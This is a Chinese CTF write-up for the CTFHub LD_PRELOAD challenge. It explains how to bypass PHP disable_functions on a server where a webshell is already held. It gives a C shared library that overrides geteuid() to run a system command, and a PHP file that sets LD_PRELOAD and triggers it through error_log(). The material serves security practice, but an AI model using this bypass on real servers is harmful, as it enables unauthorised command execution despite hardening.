CTFHUB-web进阶LD_PRELOAD
知识点:
LD_PRELOAD是Linux系统的一个环境变量,用于动态库的加载,动态库加载的优先级最高,即加载动态库时先加载LD_PRLOAD,它可以影响程序的运行时的链接(Runtime linker)。LD_PRELOAD的功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。
程序中我们经常要调用一些外部库的函数,以sendmail程序中的geteuid()为例,如果我们有个自定义的geteuid()函数,把它编译成动态库后,通过LD_PRELOAD加载,当程序中调用geteuid()函数时,调用的其实是我们自定义的geteuid()函数。而在PHP中error_log()和mail()函数在传入特定参数时都会调用到sendmail外部程序进而调用外部库的函数geteuid()。
所以我们的思路是:
在已获得webshell但被PHP的disable_function禁用了一些危险函数的命令执行的情况下
1.编写好动态链接库文件并上传到服务器
2.编写PHP文件并上传到服务器,内容为
利用putenv设置LD_PRELOAD为我们的恶意动态链接库文件的路径,然后 配合php的某个函数(例如error_log()或mail()函数)去触发运行动态链接库然后执行我们的恶意动态链接库文件
3.在浏览器去浏览我们写的PHP文件~
原理懂了,现在我们来做题吧~
首先编写动态链接库文件
text.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
system("tac /flag > result.txt");
}
int geteuid() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}
然后编写PHP
<?php
putenv("LD_PRELOAD=/var/www/html/text.so");//注意路径
error_log("text",1,"","");
?>
然后通过题目提示连上服务器再把编写好的两个文件都上传到服务器并在自己的浏览器访问一下text.php就会发现html目录下多了个文件,打开就可以看到flag啦~
发现篇挺好文章:https://blog.csdn.net/rfrder/article/details/109078117
如有错误欢迎批评指正~
参考链接:
Bypass disabled_functions一些思路总结
PHP disable_functions Bypass 的方法探究